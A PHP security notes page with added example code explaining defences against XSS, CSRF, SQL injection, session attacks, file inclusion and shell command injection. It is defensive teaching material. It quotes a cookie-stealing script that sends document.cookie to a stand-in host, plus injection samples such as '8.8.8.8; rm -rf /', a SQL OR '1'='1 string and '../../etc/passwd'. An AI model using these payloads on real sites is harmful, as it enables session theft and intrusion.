Security

IT Notes → PHP @ December 22, 2020

  • Encrypt sensitive data, filter (validate) input and escape output. Example: filter_var($field, FILTER_VALIDATE_EMAIL) returns the address or false; filter_var($field, FILTER_SANITIZE_EMAIL) only strips characters that can never appear in an address, so it can turn junk into a "valid" value. Validate, and reject on failure, rather than relying on sanitizing alone.
  • Turn off the php.ini setting magic_quotes_gpc (magic quotes were removed entirely in PHP 5.4). With the old mysql extension, mysql_real_escape_string() (not mysql_escape_string(), which ignores the connection character set) was the minimum for user input entering a query; that extension was removed in PHP 7.0, so use prepared statements through PDO or mysqli instead.
  • Put key files (configuration, credentials, uploads) outside the document root so they cannot be served directly. Also set appropriate file permissions and block relevant files and folders with .htaccess or the equivalent server configuration.
  • Set expose_php to Off, set display_errors to Off (log errors with log_errors instead), and set register_globals to Off (it was removed in PHP 5.4). Serving PHP under a different file extension only hides the technology from casual inspection; it is obscurity, not a control.
  • Spoofed forms: an attacker copies the form's HTML, replaces the action with the site's absolute URL and submits it from elsewhere, so client-side validation and hidden-field values can be bypassed. Submissions from other locations cannot be prevented, and HTTP_REFERER can be omitted or forged, so spam checks and referer checks are at best a speed bump; the real defence is tight server-side validation of every field.
  • Cross-Site Scripting (XSS) is a method where JavaScript is injected into a third-party site, say through a comment form, and runs in the browser of every visitor who views it, sending that visitor's data such as cookies to the attacker:
  • <script>
    document.location = "http://example.org/getcookies.php?cookies=" + document.cookie;
    </script>
  • This is prevented by escaping output for the context it lands in (htmlspecialchars() for HTML text and attributes), so the stored comment is displayed as text and the script never executes. Marking the session cookie HttpOnly limits what such a script can read even if escaping is missed somewhere.
  • Cross-Site Request Forgery (CSRF) abuses the application's trust in the user's browser. While the user is logged in, a third-party page (an image tag, a link, or an auto-submitted form, so requiring POST is no protection) makes the browser send a request whose parameters trigger an action, and the browser attaches the session cookie, so the site treats it as the user's own request. To prevent this, every form the site generates carries a hidden random value stored in the session; any state-changing request whose value does not match the session's is rejected (compare with hash_equals()). SameSite cookies add a second layer.
  • SQL injection: use prepared statements with bound parameters (PDO or mysqli). Fall back to the driver-specific escape function (e.g. mysqli_real_escape_string()) only where binding is impossible; escaping does nothing for values that are not quoted in the query, such as identifiers or numbers.
  • Session fixation is an attack where the attacker fixes a session id and makes you access the application with it. Once you log in or move to a higher privilege, the attacker can ride on the same session, since the session id is all the server cares about. Prevent it by regenerating the id with session_regenerate_id(true) at every privilege change, rejecting ids the application did not issue (session.use_strict_mode=1), and accepting ids only from cookies (session.use_only_cookies=1).
  • Session hijacking is obtaining the user's session id and using it. A change in HTTP_USER_AGENT mid-session is a weak signal of hijacking, but it is trivially matched by the attacker and is not a real defence; the fixes are HttpOnly and Secure cookies, TLS everywhere, and escaped output so scripts cannot read the cookie in the first place.
  • Remote code inclusion occurs when the path given to require or include is built from tainted user input; with allow_url_include on the attacker loads a remote script, and even with it off a local file of their choosing. Keep allow_url_include off and map the input onto a fixed allow-list of files rather than building a path.
  • Command injection occurs when tainted user input reaches shell execution (exec(), system(), shell_exec(), backticks). PHP provides escapeshellarg() to quote a single argument and escapeshellcmd() to escape the metacharacters of a whole command string. Use escapeshellarg() per argument: escapeshellcmd() leaves spaces alone, so an attacker can still append extra arguments to the command.
  • In shared hosting use open_basedir (restricts the paths that file functions and include/require can open), disable_functions (disables the listed functions, e.g. exec, system, shell_exec) and disable_classes (disables the listed classes).
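The input-filtering and output-escaping items above, as an added example that is not code from the original notes. It takes the cookie-stealing comment from the XSS item as constructed sample input, and the helper names (validateEmail, sanitizeThenValidateEmail, h, renderComment) are mine, not a library's.

```php
<?php
// Added example (not code from the original notes): validate input with filter_var()
// and escape on output, using the cookie-stealing comment from the notes as sample input.
declare(strict_types=1);

/** Return the address if it is syntactically valid, otherwise null. */
function validateEmail(string $raw): ?string
{
    $valid = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

/**
 * Sanitize-then-validate, as the notes suggest. The pitfall: FILTER_SANITIZE_EMAIL only
 * strips characters that can never appear in an address, so junk such as
 * "<b>user@example.org" is silently rewritten to "buser@example.org" and then passes.
 * Prefer validateEmail() and reject the original input when it fails.
 */
function sanitizeThenValidateEmail(string $raw): ?string
{
    $clean = filter_var($raw, FILTER_SANITIZE_EMAIL);
    $valid = filter_var($clean, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

/** Escape for HTML text or a double-quoted attribute value (the context a blog comment lands in). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render a stored comment: escaped, so a <script> tag becomes visible text, not code. */
function renderComment(string $author, string $body): string
{
    return '<p class="comment" data-author="' . h($author) . '">' . h($body) . '</p>';
}

// Constructed sample input: the payload from the notes, submitted through a comment form,
// plus an author name that tries to break out of the attribute it is written into.
$comment = '<script>document.location = "http://example.org/getcookies.php?cookies=" + document.cookie;</script>';
$author  = 'mallory" onmouseover="alert(1)';

echo renderComment($author, $comment), PHP_EOL;

foreach (['user@example.org', 'not an address', '<b>user@example.org'] as $input) {
    printf("%-24s validate=%s  sanitize+validate=%s\n",
        $input,
        validateEmail($input) ?? 'null',
        sanitizeThenValidateEmail($input) ?? 'null');
}
```

In the rendered comment every `<`, `>` and `"` is replaced by an entity, so neither the script tag nor the attribute break-out survives. The third address shows the sanitize pitfall: validation alone rejects it, sanitize-then-validate accepts a rewritten address the user never typed. h() is only correct for HTML text and attributes; a value written into a JavaScript string needs json_encode(), and one written into a URL needs rawurlencode().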
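The CSRF-token, session-fixation and session-hijacking items above, as one added example that is not code from the original notes. The `/transfer` route, the field name `csrf_token` and the helper names are assumptions for illustration; it also assumes the session cookie is already marked HttpOnly, Secure and SameSite through the session.cookie_* ini settings or session_set_cookie_params().

```php
<?php
// Added example (not code from the original notes): a per-session CSRF token checked on
// every state-changing POST, and session id regeneration at the privilege change.
declare(strict_types=1);

/** Return the session's CSRF token, creating it on first use. */
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $_SESSION['csrf_token'];
}

/** Compare the submitted token with the session's in constant time. */
function csrfTokenIsValid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

/** The hidden field to put inside every POST form the site itself generates. */
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Called only after the password check succeeds. Regenerating the id here means an id
 * the attacker planted before login (fixation) never carries the authenticated state;
 * the argument true deletes the old session data server-side as well.
 */
function loginUser(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']    = $userId;
    $_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? '';
    unset($_SESSION['csrf_token']); // a fresh token for the authenticated session
}

/** The weak hijack heuristic from the notes: the User-Agent changed mid-session. */
function userAgentChanged(): bool
{
    return isset($_SESSION['user_agent'])
        && $_SESSION['user_agent'] !== ($_SERVER['HTTP_USER_AGENT'] ?? '');
}

session_start();

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // Reject before doing anything: a forged request from another origin cannot know
    // the token, because the attacker cannot read this site's pages from the victim's browser.
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    if (userAgentChanged()) {
        session_unset();
        session_destroy();
        http_response_code(403);
        exit('session invalidated');
    }
    // ... perform the state change here; on a successful password check call loginUser($id).
}

// Every form the site emits carries the token; copying it to another origin does not help
// the attacker, since the token is bound to the victim's session, not to the form.
echo '<form method="post" action="/transfer">', csrfField(),
     '<input name="amount"><button>Send</button></form>', PHP_EOL;
```

hash_equals() takes the known (session) value first and the user-supplied value second. The User-Agent check is kept only because the notes mention it; an attacker who stole the cookie can copy the User-Agent just as easily, so it is a heuristic, not a control.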
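The SQL-injection, remote-code-inclusion and command-injection items above share one root cause, tainted input reaching another interpreter, so here is one added example (not code from the original notes) covering all three. It assumes the pdo_sqlite extension for an in-memory demo database; the users table, the page allow-list and the helper names are constructed for illustration, and the commands are only built as strings, never executed.

```php
<?php
// Added example (not code from the original notes): the same tainted value reaching three
// interpreters (SQL, the PHP loader, the shell), each handled the way the notes recommend.
declare(strict_types=1);

// --- SQL: bind parameters; the value is never spliced into the SQL text ---
function findUserByName(PDO $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- include: never build a path from input; map the input onto a fixed allow-list ---
const PAGES = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];

function pageFile(string $requested): string
{
    // "../../etc/passwd" or "http://evil.example/shell.txt" is simply not a key.
    if (!array_key_exists($requested, PAGES)) {
        throw new InvalidArgumentException('unknown page');
    }
    return PAGES[$requested];
}

// --- shell: escapeshellarg() per argument ---
function pingCommand(string $host): string
{
    // escapeshellarg() single-quotes the value and escapes embedded quotes, so
    // "8.8.8.8; rm -rf /" becomes one literal argument rather than a second command.
    return 'ping -c 1 ' . escapeshellarg($host);
}

// Deliberately weak variant: escapeshellcmd() on the whole line stops "; rm -rf /" but not
// extra arguments, because it leaves spaces and dashes alone.
function pingCommandWeak(string $host): string
{
    return escapeshellcmd('ping -c 1 ' . $host);
}

// Demonstration on constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");

$injected = "alice' OR '1'='1";
var_dump(findUserByName($db, 'alice'));    // alice's row
var_dump(findUserByName($db, $injected));  // null: the whole string is compared literally

echo pingCommand('8.8.8.8; rm -rf /'), PHP_EOL;
echo pingCommandWeak('8.8.8.8 -c 100000'), PHP_EOL; // the extra -c argument survives

foreach (['home', '../../etc/passwd'] as $page) {
    try {
        echo 'include ', pageFile($page), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected ', $page, ': ', $e->getMessage(), PHP_EOL;
    }
}
```

The prepared statement sends the SQL text and the value separately, so `alice' OR '1'='1` is looked up as a literal name and matches nothing. The allow-list turns the include path into a lookup, so open_basedir and allow_url_include=Off become a second line of defence rather than the only one. The weak ping variant is there to show why the notes' escapeshellcmd() is the wrong tool for arguments: the string it returns still carries a flood-sized `-c 100000`.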